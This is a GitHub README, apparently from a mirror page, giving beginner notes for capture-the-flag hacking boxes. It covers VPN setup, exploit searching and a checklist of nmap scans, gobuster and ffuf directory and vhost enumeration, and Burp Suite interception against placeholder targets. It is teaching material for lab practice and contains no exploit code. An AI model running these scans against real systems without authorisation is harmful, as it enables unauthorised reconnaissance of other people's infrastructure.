Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

From Zero To Hero

NotificationsYou must be signed in to change notification settings

0xsyr0/CTF-Notes

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

40 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CTF-Notes

From Zero To Hero

About this repository

This repository will contain various notes, code snippets, hints and different sources related to all kinds of cybersecurity topics, dropped by our team members.

Table of Contents

Where to Start

Basic Knowledge

  • It is recommended to work in a virtual environment like anKali Linux instance running onVirtualBox orVMware Player.
  • Make sure you downloaded the correct.ovpn file to connect to the network and access your box.
$sudo openvpn /PATH/TO/OVPNFILE/<USERNAME>.ovpn
  • Wordlists are usually located in/usr/share/wordlists/. The mostly used ones are:
  • If you are missing some tools, try to install them from theKali Linux repository.
$sudo apt-get install kali-linux-everything
  • If a website is not reachable viaIP address and redirects you, try to add it to the/etc/hosts file.
  • Always familiarize yourself with the tools you use and checkout their documentation as well as the parameter-h.
  • Don't run exploits from the internet without understanding what they are doing.

First Steps

There are some basic things you should be aware about when you approaching a new box.

  • Make sure to take propernotes. Probably you want to concider to write them inMarkdown andObsidian for example. Here are a few alternatives:
  • Always keep some sort ofreconnaissance running in the background likedirectory busting withGobuster, which can take some time.
  • Make sure toenumerate every service and every endpoint properly. On a website for example, check forusernames,email address schemes, check thesource of the websiteclick orhover over everylink you can find to see if they lead to something.
  • Check for already knownvulnerabilities andexploits. Therefore you can just useGoogle. Here are a few examples:
    • <APPLICATION> vulnerability
    • <APPLICATION> <VERSION> vulnerability
    • <APPLICATION> <VERSION> exploit
    • <APPLICATION> <VERSION> poc
    • <APPLICATION> <VERSION> github
    • <APPLICATION> <VERSION> github poc
    • <APPLICATION> <VERSION> github advisoryAlternatively checkExploit Database,Sploitus or usesearchsploit from the command line.
$searchsploit<APPLICATION>

Checklist

Depending on what a box offers to you, you can go through the following checklist.

  1. Run nmap!
$sudo nmap -sC -sV -p-<RHOST>$sudo nmap -sC -sV -Pn -p-<RHOST>$sudo nmap -sV -sU<RHOST>
  1. If a webserver is available, checkrobots.txt.

http://RHOST/robots.txt

  1. Also, givewhatweb a try.
$whatweb http://<RHOST>
  1. Ob websites, trydirectory busting with different wordlists.
$gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
  1. Checking forsubdomains. If a box offers you avhost entry likehttp://openadmin.htb/ for example, it is always worth it to see if there are morevhosts configured.
$gobuster vhost -u<RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt$gobuster vhost -u<RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
$ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H"Host: FUZZ.openadmin.htb" -u http://openadmin.htb --mc all --fs<NUMBER>
  1. Interceptweb requests withBurp Suite. Without getting to deep into the usage ofBurp Suite, here are the steps to configure it in your browser.
  • StartBurp Suite and open your browser onhttp://burp.
  • Then download theCA Certificate.
  • Depending on your browser, switch tosettings and then tocertificates.
  • Import thecertificate.
  • We recommend to useFoxyProxy and configure it there but you can also go with theproxy settings of your browser.
SettingValue
Proxy TypeHTTP
Proxy IP address or DNS name127.0.0.1
Port8080
  • InBurp Suite switch toTarget >Proxy settings and selectUse advanced scope control.
  • Add theIP address of the box you are approaching.
  • Switch to theProxy tab, move toIntercept and click onIntercept is off to enable it.
  • At last switch the proxy inFoxyProxy to theBurp Suite configuration and access the website. Now you can intercept the web traffic coming from and going to the box and modify as you want.

Tool Recommendations

Below you find just a few tools to start with. Of course this is not a complete list and there are always better tools for the job out there. Take small steps and get comfy with tools and techniques to develop and at last improve your unique approach on a system.

Information Gathering
Vulnerability Analysis
Web Application Analysis
Database Assessment
Password Attacks
Exploitation / Post Exploitation Tools

Trainings

If you feel you need to learn fundamentals of a new topic or to improve you knowledge in specific areas, I would recommend checking outTryHackMe which provides valuable learning paths to various topics.

Here are a few room recommendations for beginners.

Hacking Resources & Tutorials

Here are a few resources and knowledgebases to cover various topics. Starting with writeup videos ofIppSec is always a good call.

Purplestorm Wallpapers

With a little modifications to gorgeus Daena Key and Dominik Mayer art, we present you to use and downloadPurplestorm Wallpapers.

Also feel free to get in touch with us on ourDiscord, we are all willing to help!

[8]ページ先頭
©2009-2025 Movatter.jp